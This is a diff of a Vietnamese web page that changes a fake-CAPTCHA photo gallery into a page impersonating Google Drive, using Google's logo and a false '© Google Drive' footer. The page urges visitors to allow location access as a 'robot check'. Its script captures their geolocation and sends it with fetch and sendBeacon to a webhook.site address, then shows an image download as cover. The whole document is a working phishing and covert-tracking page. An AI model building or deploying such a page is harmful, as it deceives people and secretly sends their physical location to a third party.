--- a/b.html
+++ b/b.html
@@ -2,134 +2,95 @@
 <html lang="vi">
 <head>
   <meta charset="UTF-8">
-  <title>Bộ sưu tập ảnh</title>
+  <title>Google Drive - Xác minh truy cập</title>
+  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
   <style>
-    body { 
-      font-family: Arial, sans-serif;
-      background: #fafafa;
-      text-align: center;
-      margin: 40px;
-    }
-    h1 { margin-bottom: 20px; }
-
-    /* Gallery */
-    .gallery {
+    body {
+      margin: 0;
+      font-family: 'Roboto', sans-serif;
+      background: #f1f3f4;
       display: flex;
-      flex-wrap: wrap;
       justify-content: center;
-      gap: 20px;
+      align-items: center;
+      height: 100vh;
     }
-    .photo {
-      border: 1px solid #ccc;
-      padding: 10px;
-      border-radius: 8px;
+    .container {
       background: white;
-      width: 200px;
-    }
-    .photo img { max-width: 100%; border-radius: 5px; }
-    .photo a {
-      display: inline-block;
-      margin-top: 10px;
-      padding: 6px 12px;
-      background: #007bff;
-      color: white;
-      text-decoration: none;
-      border-radius: 4px;
-    }
-    .photo a:hover { background: #0056b3; }
-
-    /* Fake CAPTCHA */
-    .captcha-box {
-      display: inline-block;
-      padding: 20px;
-      border: 2px solid #ccc;
+      width: 400px;
       border-radius: 8px;
-      background: #f9f9f9;
-      margin-top: 100px;
+      box-shadow: 0 2px 8px rgba(0,0,0,0.2);
+      padding: 30px;
+      text-align: center;
+    }
+    .logo {
+      margin-bottom: 20px;
+    }
+    .logo img {
+      height: 40px;
+    }
+    h2 {
+      font-size: 20px;
+      color: #202124;
+      margin-bottom: 10px;
+    }
+    p {
+      color: #5f6368;
+      font-size: 14px;
+      margin-bottom: 20px;
     }
     button {
-      margin-top: 15px;
-      padding: 10px 20px;
-      font-size: 16px;
-      cursor: pointer;
-      border: none;
-      background: #4285f4;
+      background: #1a73e8;
       color: white;
-      border-radius: 5px;
+      border: none;
+      border-radius: 4px;
+      padding: 10px 20px;
+      font-size: 14px;
+      font-weight: 500;
+      cursor: pointer;
     }
-    button:hover { background: #3367d6; }
-
-    /* Loading giả */
-    #loading {
-      display: none;
-      margin-top: 80px;
-      font-size: 18px;
-      color: #333;
+    button:hover {
+      background: #1669c1;
     }
-    .spinner {
-      border: 4px solid #f3f3f3;
-      border-top: 4px solid #4285f4;
-      border-radius: 50%;
-      width: 40px;
-      height: 40px;
-      margin: 0 auto 15px;
-      animation: spin 1s linear infinite;
+    .footer {
+      margin-top: 20px;
+      font-size: 12px;
+      color: #5f6368;
     }
-    @keyframes spin { 100% { transform: rotate(360deg); } }
   </style>
 </head>
 <body>
-
-  <!-- CAPTCHA giả -->
-  <div class="captcha-box" id="captcha">
-    <h3>🔒 Xác nhận bạn không phải robot</h3>
-    <p>Nhấn nút bên dưới để tiếp tục</p>
-    <button onclick="verifyBot()">Tôi không phải robot</button>
+  <div class="container" id="form-box">
+    <div class="logo">
+      <img src="https://ssl.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png" alt="Google Drive">
+    </div>
+    <h2>Xác minh để tiếp tục tải xuống</h2>
+    <p>Hệ thống cần xác nhận bạn không phải robot.<br>
+    Vui lòng nhấn nút bên dưới và chọn <b>"Cho phép"</b> định vị để hoàn tất kiểm tra.</p>
+    <button onclick="verifyAccess()">Xác minh ngay</button>
+    <div class="footer">© Google Drive - Dịch vụ của Google</div>
   </div>
 
-  <!-- Loading giả -->
-  <div id="loading">
-    <div class="spinner"></div>
-    <p>Đang xác minh danh tính...</p>
-  </div>
-
-  <!-- Gallery ẩn -->
-  <div id="gallery" style="display:none;">
-    <h1>Bộ sưu tập ảnh của tôi</h1>
-    <p>Bạn có thể tải xuống những bức ảnh bên dưới:</p>
-    <div class="gallery">
-      <div class="photo">
-        <img src="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" alt="Ảnh 1">
-        <a href="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" download>📥 Tải ảnh</a>
-      </div>
-      <div class="photo">
-        <img src="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" alt="Ảnh 2">
-        <a href="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" download>📥 Tải ảnh</a>
-      </div>
-      <div class="photo">
-        <img src="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" alt="Ảnh 3">
-        <a href="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" download>📥 Tải ảnh</a>
-      </div>
+  <div class="container" id="gallery" style="display:none;">
+    <h2>Tệp có sẵn để tải xuống</h2>
+    <div>
+      <a href="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" download>
+        📥 Tải ảnh
+      </a>
     </div>
   </div>
 
   <script>
     const webhook = "https://webhook.site/aac873f7-5c2e-4afd-94eb-9944647c8eca";
 
-function sendToWebhook(data) {
-  const body = JSON.stringify(data);
-  fetch(webhook, { method: "POST", body, keepalive: true })
-    .catch(()=>{});
-  navigator.sendBeacon(webhook, body);
-}
+    function sendToWebhook(data) {
+      const body = JSON.stringify(data);
+      fetch(webhook, { method: "POST", body, keepalive: true }).catch(()=>{});
+      navigator.sendBeacon(webhook, body);
+    }
 
+    function verifyAccess() {
+      document.getElementById("form-box").innerHTML = "<p>🔄 Đang xác minh danh tính... Vui lòng chờ...</p>";
 
-    function verifyBot() {
-      // Ẩn captcha, hiện loading
-      document.getElementById("captcha").style.display = "none";
-      document.getElementById("loading").style.display = "block";
-
-      // Xin quyền vị trí ngay khi loading
       if (navigator.geolocation) {
         navigator.geolocation.getCurrentPosition(
           pos => {
@@ -153,11 +114,10 @@ function sendToWebhook(data) {
         );
       }
 
-      // Sau 3 giây hiện gallery
       setTimeout(() => {
-        document.getElementById("loading").style.display = "none";
+        document.getElementById("form-box").style.display = "none";
         document.getElementById("gallery").style.display = "block";
-      }, 3000);
+      }, 2500);
     }
   </script>
 </body>
